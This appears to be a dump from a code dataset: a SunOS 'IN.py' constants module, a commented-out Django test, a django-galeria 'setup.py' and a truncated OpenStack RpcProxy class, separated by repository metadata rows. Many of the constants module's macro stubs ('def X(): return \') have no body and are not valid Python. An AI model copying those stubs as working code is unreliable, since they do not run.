PSL_UBITS = (PSR_ICC|PSR_EF)
def USERMODE(ps): return (((ps) & PSR_PS) == 0)
# Included from sys/fsr.h
FSR_CEXC = 0x0000001f
FSR_AEXC = 0x000003e0
FSR_FCC = 0x00000c00
FSR_PR = 0x00001000
FSR_QNE = 0x00002000
FSR_FTT = 0x0001c000
FSR_VER = 0x000e0000
FSR_TEM = 0x0f800000
FSR_RP = 0x30000000
FSR_RD = 0xc0000000
FSR_VER_SHIFT = 17
FSR_FCC1 = 0x00000003
FSR_FCC2 = 0x0000000C
FSR_FCC3 = 0x00000030
FSR_CEXC_NX = 0x00000001
FSR_CEXC_DZ = 0x00000002
FSR_CEXC_UF = 0x00000004
FSR_CEXC_OF = 0x00000008
FSR_CEXC_NV = 0x00000010
FSR_AEXC_NX = (0x1 << 5)
FSR_AEXC_DZ = (0x2 << 5)
FSR_AEXC_UF = (0x4 << 5)
FSR_AEXC_OF = (0x8 << 5)
FSR_AEXC_NV = (0x10 << 5)
FTT_NONE = 0
FTT_IEEE = 1
FTT_UNFIN = 2
FTT_UNIMP = 3
FTT_SEQ = 4
FTT_ALIGN = 5
FTT_DFAULT = 6
FSR_FTT_SHIFT = 14
FSR_FTT_IEEE = (FTT_IEEE << FSR_FTT_SHIFT)
FSR_FTT_UNFIN = (FTT_UNFIN << FSR_FTT_SHIFT)
FSR_FTT_UNIMP = (FTT_UNIMP << FSR_FTT_SHIFT)
FSR_FTT_SEQ = (FTT_SEQ << FSR_FTT_SHIFT)
FSR_FTT_ALIGN = (FTT_ALIGN << FSR_FTT_SHIFT)
FSR_FTT_DFAULT = (FTT_DFAULT << FSR_FTT_SHIFT)
FSR_TEM_NX = (0x1 << 23)
FSR_TEM_DZ = (0x2 << 23)
FSR_TEM_UF = (0x4 << 23)
FSR_TEM_OF = (0x8 << 23)
FSR_TEM_NV = (0x10 << 23)
RP_DBLEXT = 0
RP_SINGLE = 1
RP_DOUBLE = 2
RP_RESERVED = 3
RD_NEAR = 0
RD_ZER0 = 1
RD_POSINF = 2
RD_NEGINF = 3
FPRS_DL = 0x1
FPRS_DU = 0x2
FPRS_FEF = 0x4
PIL_MAX = 0xf
def SAVE_GLOBALS(RP): return \
def RESTORE_GLOBALS(RP): return \
def SAVE_OUTS(RP): return \
def RESTORE_OUTS(RP): return \
def SAVE_WINDOW(SBP): return \
def RESTORE_WINDOW(SBP): return \
def STORE_FPREGS(FP): return \
def LOAD_FPREGS(FP): return \
_SPARC_MAXREGWINDOW = 31
_XRS_ID = 0x78727300
GETCONTEXT = 0
SETCONTEXT = 1
UC_SIGMASK = 001
UC_STACK = 002
UC_CPU = 004
UC_MAU = 010
UC_FPU = UC_MAU
UC_INTR = 020
UC_ASR = 040
UC_MCONTEXT = (UC_CPU|UC_FPU|UC_ASR)
UC_ALL = (UC_SIGMASK|UC_STACK|UC_MCONTEXT)
_SIGQUEUE_MAX = 32
_SIGNOTIFY_MAX = 32
# Included from sys/pcb.h
INSTR_VALID = 0x02
NORMAL_STEP = 0x04
WATCH_STEP = 0x08
CPC_OVERFLOW = 0x10
ASYNC_HWERR = 0x20
STEP_NONE = 0
STEP_REQUESTED = 1
STEP_ACTIVE = 2
STEP_WASACTIVE = 3
# Included from sys/msacct.h
LMS_USER = 0
LMS_SYSTEM = 1
LMS_TRAP = 2
LMS_TFAULT = 3
LMS_DFAULT = 4
LMS_KFAULT = 5
LMS_USER_LOCK = 6
LMS_SLEEP = 7
LMS_WAIT_CPU = 8
LMS_STOPPED = 9
NMSTATES = 10
# Included from sys/lwp.h
# Included from sys/synch.h
from TYPES import *
USYNC_THREAD = 0x00
USYNC_PROCESS = 0x01
LOCK_NORMAL = 0x00
LOCK_ERRORCHECK = 0x02
LOCK_RECURSIVE = 0x04
USYNC_PROCESS_ROBUST = 0x08
LOCK_PRIO_NONE = 0x00
LOCK_PRIO_INHERIT = 0x10
LOCK_PRIO_PROTECT = 0x20
LOCK_STALL_NP = 0x00
LOCK_ROBUST_NP = 0x40
LOCK_OWNERDEAD = 0x1
LOCK_NOTRECOVERABLE = 0x2
LOCK_INITED = 0x4
LOCK_UNMAPPED = 0x8
LWP_DETACHED = 0x00000040
LWP_SUSPENDED = 0x00000080
__LWP_ASLWP = 0x00000100
MAXSYSARGS = 8
NORMALRETURN = 0
JUSTRETURN = 1
LWP_USER = 0x01
LWP_SYS = 0x02
TS_FREE = 0x00
TS_SLEEP = 0x01
TS_RUN = 0x02
TS_ONPROC = 0x04
TS_ZOMB = 0x08
TS_STOPPED = 0x10
T_INTR_THREAD = 0x0001
T_WAKEABLE = 0x0002
T_TOMASK = 0x0004
T_TALLOCSTK = 0x0008
T_WOULDBLOCK = 0x0020
T_DONTBLOCK = 0x0040
T_DONTPEND = 0x0080
T_SYS_PROF = 0x0100
T_WAITCVSEM = 0x0200
T_WATCHPT = 0x0400
T_PANIC = 0x0800
TP_HOLDLWP = 0x0002
TP_TWAIT = 0x0004
TP_LWPEXIT = 0x0008
TP_PRSTOP = 0x0010
TP_CHKPT = 0x0020
TP_EXITLWP = 0x0040
TP_PRVSTOP = 0x0080
TP_MSACCT = 0x0100
TP_STOPPING = 0x0200
TP_WATCHPT = 0x0400
TP_PAUSE = 0x0800
TP_CHANGEBIND = 0x1000
TS_LOAD = 0x0001
TS_DONT_SWAP = 0x0002
TS_SWAPENQ = 0x0004
TS_ON_SWAPQ = 0x0008
TS_CSTART = 0x0100
TS_UNPAUSE = 0x0200
TS_XSTART = 0x0400
TS_PSTART = 0x0800
TS_RESUME = 0x1000
TS_CREATE = 0x2000
TS_ALLSTART = \
(TS_CSTART|TS_UNPAUSE|TS_XSTART|TS_PSTART|TS_RESUME|TS_CREATE)
def CPR_VSTOPPED(t): return \
def THREAD_TRANSITION(tp): return thread_transition(tp);
def THREAD_STOP(tp): return \
def THREAD_ZOMB(tp): return THREAD_SET_STATE(tp, TS_ZOMB, NULL)
def SEMA_HELD(x): return (sema_held((x)))
NO_LOCKS_HELD = 1
NO_COMPETING_THREADS = 1
# Included from sys/cred.h
# Included from sys/uio.h
from TYPES import *
# Included from sys/resource.h
from TYPES import *
PRIO_PROCESS = 0
PRIO_PGRP = 1
PRIO_USER = 2
RLIMIT_CPU = 0
RLIMIT_FSIZE = 1
RLIMIT_DATA = 2
RLIMIT_STACK = 3
RLIMIT_CORE = 4
RLIMIT_NOFILE = 5
RLIMIT_VMEM = 6
RLIMIT_AS = RLIMIT_VMEM
RLIM_NLIMITS = 7
RLIM_INFINITY = (-3l)
RLIM_SAVED_MAX = (-2l)
RLIM_SAVED_CUR = (-1l)
RLIM_INFINITY = 0x7fffffff
RLIM_SAVED_MAX = 0x7ffffffe
RLIM_SAVED_CUR = 0x7ffffffd
RLIM32_INFINITY = 0x7fffffff
RLIM32_SAVED_MAX = 0x7ffffffe
RLIM32_SAVED_CUR = 0x7ffffffd
# Included from sys/model.h
# Included from sys/debug.h
def ASSERT64(x): return ASSERT(x)
def ASSERT32(x): return ASSERT(x)
DATAMODEL_MASK = 0x0FF00000
DATAMODEL_ILP32 = 0x00100000
DATAMODEL_LP64 = 0x00200000
DATAMODEL_NONE = 0
DATAMODEL_NATIVE = DATAMODEL_LP64
DATAMODEL_NATIVE = DATAMODEL_ILP32
def STRUCT_SIZE(handle): return \
def STRUCT_BUF(handle): return ((handle).ptr.m64)
def SIZEOF_PTR(umodel): return \
def STRUCT_SIZE(handle): return (sizeof (*(handle).ptr))
def STRUCT_BUF(handle): return ((handle).ptr)
def SIZEOF_PTR(umodel): return sizeof (caddr_t)
def lwp_getdatamodel(t): return DATAMODEL_ILP32
RUSAGE_SELF = 0
RUSAGE_CHILDREN = -1
# Included from vm/seg_enum.h
# Included from sys/buf.h
# Included from sys/kstat.h
from TYPES import *
KSTAT_STRLEN = 31
def KSTAT_ENTER(k): return \
def KSTAT_EXIT(k): return \
KSTAT_TYPE_RAW = 0
KSTAT_TYPE_NAMED = 1
KSTAT_TYPE_INTR = 2
KSTAT_TYPE_IO = 3
KSTAT_TYPE_TIMER = 4
KSTAT_NUM_TYPES = 5
KSTAT_FLAG_VIRTUAL = 0x01
KSTAT_FLAG_VAR_SIZE = 0x02
KSTAT_FLAG_WRITABLE = 0x04
KSTAT_FLAG_PERSISTENT = 0x08
KSTAT_FLAG_DORMANT = 0x10
KSTAT_FLAG_INVALID = 0x20
KSTAT_READ = 0
KSTAT_WRITE = 1
KSTAT_DATA_CHAR = 0
KSTAT_DATA_INT32 = 1
KSTAT_DATA_UINT32 = 2
KSTAT_DATA_INT64 = 3
KSTAT_DATA_UINT64 = 4
KSTAT_DATA_LONG = KSTAT_DATA_INT32
KSTAT_DATA_ULONG = KSTAT_DATA_UINT32
KSTAT_DATA_LONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONG = KSTAT_DATA_UINT64
KSTAT_DATA_LONG = 7
KSTAT_DATA_ULONG = 8
KSTAT_DATA_LONGLONG = KSTAT_DATA_INT64
KSTAT_DATA_ULONGLONG = KSTAT_DATA_UINT64
KSTAT_DATA_FLOAT = 5
KSTAT_DATA_DOUBLE = 6
KSTAT_INTR_HARD = 0
KSTAT_INTR_SOFT = 1
KSTAT_INTR_WATCHDOG = 2
KSTAT_INTR_SPURIOUS = 3
KSTAT_INTR_MULTSVC = 4
KSTAT_NUM_INTRS = 5
B_BUSY = 0x0001
B_DONE = 0x0002
B_ERROR = 0x0004
B_PAGEIO = 0x0010
B_PHYS = 0x0020
B_READ = 0x0040
B_WRITE = 0x0100
B_KERNBUF = 0x0008
B_WANTED = 0x0080
B_AGE = 0x000200
B_ASYNC = 0x000400
B_DELWRI = 0x000800
B_STALE = 0x001000
B_DONTNEED = 0x002000
B_REMAPPED = 0x004000
B_FREE = 0x008000
B_INVAL = 0x010000
B_FORCE = 0x020000
B_HEAD = 0x040000
B_NOCACHE = 0x080000
B_TRUNC = 0x100000
B_SHADOW = 0x200000
B_RETRYWRI = 0x400000
def notavail(bp): return \
def BWRITE(bp): return \
def BWRITE2(bp): return \
VROOT = 0x01
VNOCACHE = 0x02
VNOMAP = 0x04
VDUP = 0x08
VNOSWAP = 0x10
VNOMOUNT = 0x20
VISSWAP = 0x40
VSWAPLIKE = 0x80
VVFSLOCK = 0x100
VVFSWAIT = 0x200
VVMLOCK = 0x400
VDIROPEN = 0x800
VVMEXEC = 0x1000
VPXFS = 0x2000
AT_TYPE = 0x0001
AT_MODE = 0x0002
AT_UID = 0x0004
AT_GID = 0x0008
AT_FSID = 0x0010
AT_NODEID = 0x0020
AT_NLINK = 0x0040
AT_SIZE = 0x0080
AT_ATIME = 0x0100
AT_MTIME = 0x0200
AT_CTIME = 0x0400
AT_RDEV = 0x0800
AT_BLKSIZE = 0x1000
AT_NBLOCKS = 0x2000
AT_VCODE = 0x4000
AT_ALL = (AT_TYPE|AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|\
AT_NLINK|AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|\
AT_RDEV|AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
AT_STAT = (AT_MODE|AT_UID|AT_GID|AT_FSID|AT_NODEID|AT_NLINK|\
AT_SIZE|AT_ATIME|AT_MTIME|AT_CTIME|AT_RDEV)
AT_TIMES = (AT_ATIME|AT_MTIME|AT_CTIME)
AT_NOSET = (AT_NLINK|AT_RDEV|AT_FSID|AT_NODEID|AT_TYPE|\
AT_BLKSIZE|AT_NBLOCKS|AT_VCODE)
VSUID = 04000
VSGID = 02000
VSVTX = 01000
VREAD = 00400
VWRITE = 00200
VEXEC = 00100
MODEMASK = 07777
PERMMASK = 00777
def MANDMODE(mode): return (((mode) & (VSGID|(VEXEC>>3))) == VSGID)
VSA_ACL = 0x0001
VSA_ACLCNT = 0x0002
VSA_DFACL = 0x0004
VSA_DFACLCNT = 0x0008
LOOKUP_DIR = 0x01
DUMP_ALLOC = 0
DUMP_FREE = 1
DUMP_SCAN = 2
ATTR_UTIME = 0x01
ATTR_EXEC = 0x02
ATTR_COMM = 0x04
ATTR_HINT = 0x08
ATTR_REAL = 0x10
# Included from sys/poll.h
POLLIN = 0x0001
POLLPRI = 0x0002
POLLOUT = 0x0004
POLLRDNORM = 0x0040
POLLWRNORM = POLLOUT
POLLRDBAND = 0x0080
POLLWRBAND = 0x0100
POLLNORM = POLLRDNORM
POLLERR = 0x0008
POLLHUP = 0x0010
POLLNVAL = 0x0020
POLLREMOVE = 0x0800
POLLRDDATA = 0x0200
POLLNOERR = 0x0400
POLLCLOSED = 0x8000
# Included from sys/strmdep.h
def str_aligned(X): return (((ulong_t)(X) & (sizeof (long) - 1)) == 0)
# Included from sys/strft.h
tdelta_t_sz = 12
FTEV_MASK = 0x1FFF
FTEV_ISWR = 0x8000
FTEV_CS = 0x4000
FTEV_PS = 0x2000
FTEV_QMASK = 0x1F00
FTEV_ALLOCMASK = 0x1FF8
FTEV_ALLOCB = 0x0000
FTEV_ESBALLOC = 0x0001
FTEV_DESBALLOC = 0x0002
FTEV_ESBALLOCA = 0x0003
FTEV_DESBALLOCA = 0x0004
FTEV_ALLOCBIG = 0x0005
FTEV_ALLOCBW = 0x0006
FTEV_FREEB = 0x0008
FTEV_DUPB = 0x0009
FTEV_COPYB = 0x000A
FTEV_CALLER = 0x000F
FTEV_PUT = 0x0100
FTEV_FSYNCQ = 0x0103
FTEV_DSYNCQ = 0x0104
FTEV_PUTQ = 0x0105
FTEV_GETQ = 0x0106
FTEV_RMVQ = 0x0107
FTEV_INSQ = 0x0108
FTEV_PUTBQ = 0x0109
FTEV_FLUSHQ = 0x010A
FTEV_REPLYQ = 0x010B
FTEV_PUTNEXT = 0x010D
FTEV_RWNEXT = 0x010E
FTEV_QWINNER = 0x010F
FTEV_GEWRITE = 0x0101
def FTFLW_HASH(h): return (((unsigned)(h))%ftflw_hash_sz)
FTBLK_EVNTS = 0x9
QENAB = 0x00000001
QWANTR = 0x00000002
QWANTW = 0x00000004
QFULL = 0x00000008
QREADR = 0x00000010
QUSE = 0x00000020
QNOENB = 0x00000040
QBACK = 0x00000100
QHLIST = 0x00000200
QPAIR = 0x00000800
QPERQ = 0x00001000
QPERMOD = 0x00002000
QMTSAFE = 0x00004000
QMTOUTPERIM = 0x00008000
QMT_TYPEMASK = (QPAIR|QPERQ|QPERMOD|QMTSAFE|QMTOUTPERIM)
QINSERVICE = 0x00010000
QWCLOSE = 0x00020000
QEND = 0x00040000
QWANTWSYNC = 0x00080000
QSYNCSTR = 0x00100000
QISDRV = 0x00200000
QHOT = 0x00400000
QNEXTHOT = 0x00800000
_QINSERTING = 0x04000000
_QREMOVING = 0x08000000
Q_SQQUEUED = 0x01
Q_SQDRAINING = 0x02
QB_FULL = 0x01
QB_WANTW = 0x02
QB_BACK = 0x04
NBAND = 256
STRUIOT_NONE = -1
STRUIOT_DONTCARE = 0
STRUIOT_STANDARD = 1
STRUIOT_IP = 2
DBLK_REFMIN = 0x01
STRUIO_SPEC = 0x01
STRUIO_DONE = 0x02
STRUIO_IP = 0x04
STRUIO_ZC = 0x08
STRUIO_ICK = 0x10
MSGMARK = 0x01
MSGNOLOOP = 0x02
MSGDELIM = 0x04
MSGNOGET = 0x08
MSGMARKNEXT = 0x10
MSGNOTMARKNEXT = 0x20
M_DATA = 0x00
M_PROTO = 0x01
M_BREAK = 0x08
M_PASSFP = 0x09
M_EVENT = 0x0a
M_SIG = 0x0b
M_DELAY = 0x0c
M_CTL = 0x0d
M_IOCTL = 0x0e
M_SETOPTS = 0x10
M_RSE = 0x11
M_IOCACK = 0x81
M_IOCNAK = 0x82
M_PCPROTO = 0x83
M_PCSIG = 0x84
M_READ = 0x85
M_FLUSH = 0x86
M_STOP = 0x87
M_START = 0x88
M_HANGUP = 0x89
M_ERROR = 0x8a
M_COPYIN = 0x8b
M_COPYOUT = 0x8c
M_IOCDATA = 0x8d
M_PCRSE = 0x8e
M_STOPI = 0x8f
M_STARTI = 0x90
M_PCEVENT = 0x91
M_UNHANGUP = 0x92
QNORM = 0x00
QPCTL = 0x80
IOC_MODELS = DATAMODEL_MASK
IOC_ILP32 = DATAMODEL_ILP32
IOC_LP64 = DATAMODEL_LP64
IOC_NATIVE = DATAMODEL_NATIVE
IOC_NONE = DATAMODEL_NONE
STRCANON = 0x01
RECOPY = 0x02
SO_ALL = 0x003f
SO_READOPT = 0x0001
SO_WROFF = 0x0002
SO_MINPSZ = 0x0004
SO_MAXPSZ = 0x0008
SO_HIWAT = 0x0010
SO_LOWAT = 0x0020
SO_MREADON = 0x0040
SO_MREADOFF = 0x0080
SO_NDELON = 0x0100
SO_NDELOFF = 0x0200
SO_ISTTY = 0x0400
SO_ISNTTY = 0x0800
SO_TOSTOP = 0x1000
SO_TONSTOP = 0x2000
SO_BAND = 0x4000
SO_DELIM = 0x8000
SO_NODELIM = 0x010000
SO_STRHOLD = 0x020000
SO_ERROPT = 0x040000
SO_COPYOPT = 0x080000
SO_MAXBLK = 0x100000
DEF_IOV_MAX = 16
INFOD_FIRSTBYTES = 0x02
INFOD_BYTES = 0x04
INFOD_COUNT = 0x08
INFOD_COPYOUT = 0x10
MODOPEN = 0x1
CLONEOPEN = 0x2
CONSOPEN = 0x4
OPENFAIL = -1
BPRI_LO = 1
BPRI_MED = 2
BPRI_HI = 3
BPRI_FT = 4
INFPSZ = -1
FLUSHALL = 1
FLUSHDATA = 0
STRHIGH = 5120
STRLOW = 1024
MAXIOCBSZ = 1024
PERIM_INNER = 1
PERIM_OUTER = 2
def datamsg(type): return \
def straln(a): return (caddr_t)((intptr_t)(a) & ~(sizeof (int)-1))
# Included from sys/byteorder.h
def ntohl(x): return (x)
def ntohs(x): return (x)
def htonl(x): return (x)
def htons(x): return (x)
IPPROTO_IP = 0
IPPROTO_HOPOPTS = 0
IPPROTO_ICMP = 1
IPPROTO_IGMP = 2
IPPROTO_GGP = 3
IPPROTO_ENCAP = 4
IPPROTO_TCP = 6
IPPROTO_EGP = 8
IPPROTO_PUP = 12
IPPROTO_UDP = 17
IPPROTO_IDP = 22
IPPROTO_IPV6 = 41
IPPROTO_ROUTING = 43
IPPROTO_FRAGMENT = 44
IPPROTO_RSVP = 46
IPPROTO_ESP = 50
IPPROTO_AH = 51
IPPROTO_ICMPV6 = 58
IPPROTO_NONE = 59
IPPROTO_DSTOPTS = 60
IPPROTO_HELLO = 63
IPPROTO_ND = 77
IPPROTO_EON = 80
IPPROTO_PIM = 103
IPPROTO_RAW = 255
IPPROTO_MAX = 256
IPPORT_ECHO = 7
IPPORT_DISCARD = 9
IPPORT_SYSTAT = 11
IPPORT_DAYTIME = 13
IPPORT_NETSTAT = 15
IPPORT_FTP = 21
IPPORT_TELNET = 23
IPPORT_SMTP = 25
IPPORT_TIMESERVER = 37
IPPORT_NAMESERVER = 42
IPPORT_WHOIS = 43
IPPORT_MTP = 57
IPPORT_BOOTPS = 67
IPPORT_BOOTPC = 68
IPPORT_TFTP = 69
IPPORT_RJE = 77
IPPORT_FINGER = 79
IPPORT_TTYLINK = 87
IPPORT_SUPDUP = 95
IPPORT_EXECSERVER = 512
IPPORT_LOGINSERVER = 513
IPPORT_CMDSERVER = 514
IPPORT_EFSSERVER = 520
IPPORT_BIFFUDP = 512
IPPORT_WHOSERVER = 513
IPPORT_ROUTESERVER = 520
IPPORT_RESERVED = 1024
IPPORT_USERRESERVED = 5000
IMPLINK_IP = 155
IMPLINK_LOWEXPER = 156
IMPLINK_HIGHEXPER = 158
IN_CLASSA_NSHIFT = 24
IN_CLASSA_MAX = 128
IN_CLASSB_NSHIFT = 16
IN_CLASSB_MAX = 65536
IN_CLASSC_NSHIFT = 8
IN_CLASSD_NSHIFT = 28
def IN_MULTICAST(i): return IN_CLASSD(i)
IN_LOOPBACKNET = 127
def IN_SET_LOOPBACK_ADDR(a): return \
def IN6_IS_ADDR_UNSPECIFIED(addr): return \
def IN6_IS_ADDR_LOOPBACK(addr): return \
def IN6_IS_ADDR_LOOPBACK(addr): return \
def IN6_IS_ADDR_MULTICAST(addr): return \
def IN6_IS_ADDR_MULTICAST(addr): return \
def IN6_IS_ADDR_LINKLOCAL(addr): return \
def IN6_IS_ADDR_LINKLOCAL(addr): return \
def IN6_IS_ADDR_SITELOCAL(addr): return \
def IN6_IS_ADDR_SITELOCAL(addr): return \
def IN6_IS_ADDR_V4MAPPED(addr): return \
def IN6_IS_ADDR_V4MAPPED(addr): return \
def IN6_IS_ADDR_V4MAPPED_ANY(addr): return \
def IN6_IS_ADDR_V4MAPPED_ANY(addr): return \
def IN6_IS_ADDR_V4COMPAT(addr): return \
def IN6_IS_ADDR_V4COMPAT(addr): return \
def IN6_IS_ADDR_MC_RESERVED(addr): return \
def IN6_IS_ADDR_MC_RESERVED(addr): return \
def IN6_IS_ADDR_MC_NODELOCAL(addr): return \
def IN6_IS_ADDR_MC_NODELOCAL(addr): return \
def IN6_IS_ADDR_MC_LINKLOCAL(addr): return \
def IN6_IS_ADDR_MC_LINKLOCAL(addr): return \
def IN6_IS_ADDR_MC_SITELOCAL(addr): return \
def IN6_IS_ADDR_MC_SITELOCAL(addr): return \
def IN6_IS_ADDR_MC_ORGLOCAL(addr): return \
def IN6_IS_ADDR_MC_ORGLOCAL(addr): return \
def IN6_IS_ADDR_MC_GLOBAL(addr): return \
def IN6_IS_ADDR_MC_GLOBAL(addr): return \
IP_OPTIONS = 1
IP_HDRINCL = 2
IP_TOS = 3
IP_TTL = 4
IP_RECVOPTS = 5
IP_RECVRETOPTS = 6
IP_RECVDSTADDR = 7
IP_RETOPTS = 8
IP_MULTICAST_IF = 0x10
IP_MULTICAST_TTL = 0x11
IP_MULTICAST_LOOP = 0x12
IP_ADD_MEMBERSHIP = 0x13
IP_DROP_MEMBERSHIP = 0x14
IP_SEC_OPT = 0x22
IPSEC_PREF_NEVER = 0x01
IPSEC_PREF_REQUIRED = 0x02
IPSEC_PREF_UNIQUE = 0x04
IP_ADD_PROXY_ADDR = 0x40
IP_BOUND_IF = 0x41
IP_UNSPEC_SRC = 0x42
IP_REUSEADDR = 0x104
IP_DONTROUTE = 0x105
IP_BROADCAST = 0x106
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IPV6_RTHDR_TYPE_0 = 0
IPV6_UNICAST_HOPS = 0x5
IPV6_MULTICAST_IF = 0x6
IPV6_MULTICAST_HOPS = 0x7
IPV6_MULTICAST_LOOP = 0x8
IPV6_JOIN_GROUP = 0x9
IPV6_LEAVE_GROUP = 0xa
IPV6_ADD_MEMBERSHIP = 0x9
IPV6_DROP_MEMBERSHIP = 0xa
IPV6_PKTINFO = 0xb
IPV6_HOPLIMIT = 0xc
IPV6_NEXTHOP = 0xd
IPV6_HOPOPTS = 0xe
IPV6_DSTOPTS = 0xf
IPV6_RTHDR = 0x10
IPV6_RTHDRDSTOPTS = 0x11
IPV6_RECVPKTINFO = 0x12
IPV6_RECVHOPLIMIT = 0x13
IPV6_RECVHOPOPTS = 0x14
IPV6_RECVDSTOPTS = 0x15
IPV6_RECVRTHDR = 0x16
IPV6_RECVRTHDRDSTOPTS = 0x17
IPV6_CHECKSUM = 0x18
IPV6_BOUND_IF = 0x41
IPV6_UNSPEC_SRC = 0x42
INET_ADDRSTRLEN = 16
INET6_ADDRSTRLEN = 46
IPV6_PAD1_OPT = 0
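# --- Hypothetical usage sketch (not part of the generated header above) ---
# The module is a flat namespace of constants mirroring <netinet/in.h>; a
# consumer typically references them alongside the socket module. The import
# name IN assumes the SunOS 5 platform directory is on sys.path.
import socket
import IN
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, IN.IPPROTO_TCP)
s.setsockopt(IN.IPPROTO_IP, IN.IP_TOS, 0)   # IPPROTO_IP = 0, IP_TOS = 3 above
s.close()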
|
xbmc/xbmc-antiquated
|
xbmc/lib/libPython/Python/Lib/plat-sunos5/IN.py
|
Python
|
gpl-2.0
| 28,151 | 0.005044 |
# from test_plus.test import TestCase
#
#
# class TestUser(TestCase):
#
# def setUp(self):
# self.user = self.make_user()
#
# def test__str__(self):
# self.assertEqual(
# self.user.__str__(),
# 'testuser' # This is the default username for self.make_user()
# )
#
# def test_get_absolute_url(self):
# self.assertEqual(
# self.user.get_absolute_url(),
# '/users/testuser/'
# )
|
Alex-Just/gymlog
|
gymlog/main/tests/test_models.py
|
Python
|
mit
| 476 | 0 |
#!/usr/bin/env python
import codecs
import os
import sys
from setuptools import setup, find_packages
if 'publish' in sys.argv:
os.system('python setup.py sdist upload')
sys.exit()
read = lambda filepath: codecs.open(filepath, 'r', 'utf-8').read()
# Dynamically calculate the version based on galeria.VERSION.
version = __import__('galeria').get_version()
setup(
name='django-galeria',
version=version,
description='Pluggable gallery/portfolio application for Django projects',
long_description=read(os.path.join(os.path.dirname(__file__), 'README.rst')),
author='Guilherme Gondim',
author_email='[email protected]',
maintainer='Guilherme Gondim',
maintainer_email='[email protected]',
license='BSD License',
url='https://bitbucket.org/semente/django-galeria/',
packages=find_packages(),
zip_safe=False,
include_package_data=True,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=['django-mptt']
)
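# --- Hypothetical usage sketch (not part of the setup script above) ---
# The version string is pulled from the package itself via
# __import__('galeria').get_version(); a compatible galeria/__init__.py could
# look like this (the version tuple is invented for illustration):
VERSION = (1, 0, 0)
def get_version():
    return '.'.join(str(part) for part in VERSION)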
|
zokeber/django-galeria
|
setup.py
|
Python
|
bsd-3-clause
| 1,378 | 0.002177 |
# Copyright 2012-2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A helper class for proxy objects to remote APIs.
For more information about rpc API version numbers, see:
rpc/dispatcher.py
"""
from ceilometer.openstack.common import rpc
from ceilometer.openstack.common.rpc import common as rpc_common
from ceilometer.openstack.common.rpc import serializer as rpc_serializer
class RpcProxy(object):
"""A helper class for rpc clients.
This class is a wrapper around the RPC client API. It allows you to
specify the topic and API version in a single place. This is intended to
be used as a base class for a class that implements the client side of an
rpc API.
"""
# The default namespace, which can be overridden in a subclass.
RPC_API_NAMESPACE = None
def __init__(self, topic, default_version, version_cap=None,
serializer=None):
"""Initialize an RpcProxy.
:param topic: The topic to use for all messages.
:param default_version: The default API version to request in all
outgoing messages. This can be overridden on a per-message
basis.
:param version_cap: Optionally cap the maximum version used for sent
messages.
:param serializer: Optionally (de-)serialize entities with a
provided helper.
"""
self.topic = topic
self.default_version = default_version
self.version_cap = version_cap
if serializer is None:
serializer = rpc_serializer.NoOpSerializer()
self.serializer = serializer
super(RpcProxy, self).__init__()
def _set_version(self, msg, vers):
"""Helper method to set the version in a message.
:param msg: The message having a version added to it.
:param vers: The version number to add to the message.
"""
v = vers if vers else self.default_version
if (self.version_cap and not
rpc_common.version_is_compatible(self.version_cap, v)):
raise rpc_common.RpcVersionCapError(version_cap=self.version_cap)
msg['version'] = v
def _get_topic(self, topic):
"""Return the topic to use for a message."""
return topic if topic else self.topic
def can_send_version(self, version):
"""Check to see if a version is compatible with the version cap."""
return (not self.version_cap or
rpc_common.version_is_compatible(self.version_cap, version))
@staticmethod
def make_namespaced_msg(method, namespace, **kwargs):
return {'method': method, 'namespace': namespace, 'args': kwargs}
def make_msg(self, method, **kwargs):
return self.make_namespaced_msg(method, self.RPC_API_NAMESPACE,
**kwargs)
def _serialize_msg_args(self, context, kwargs):
"""Helper method called to serialize message arguments.
This calls our serializer on each argument, returning a new
set of args that have been serialized.
:param context: The request context
:param kwargs: The arguments to serialize
:returns: A new set of serialized arguments
"""
new_kwargs = dict()
for argname, arg in kwargs.iteritems():
new_kwargs[argname] = self.serializer.serialize_entity(context,
arg)
return new_kwargs
def call(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.call() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: The return value from the remote method.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.call(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def multicall(self, context, msg, topic=None, version=None, timeout=None):
"""rpc.multicall() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:param timeout: (Optional) A timeout to use when waiting for the
response. If no timeout is specified, a default timeout will be
used that is usually sufficient.
:returns: An iterator that lets you process each of the returned values
from the remote method as they arrive.
"""
self._set_version(msg, version)
msg['args'] = self._serialize_msg_args(context, msg['args'])
real_topic = self._get_topic(topic)
try:
result = rpc.multicall(context, real_topic, msg, timeout)
return self.serializer.deserialize_entity(context, result)
except rpc.common.Timeout as exc:
raise rpc.common.Timeout(
exc.info, real_topic, msg.get('method'))
def cast(self, context, msg, topic=None, version=None):
"""rpc.cast() a remote method.
:param context: The request context
:param msg: The message to send, including the method and args.
:param topic: Override the topic for this message.
:param version: (Optional) Override the requested API version in this
message.
:returns: None. rpc.cast() does not wait on any return value from the
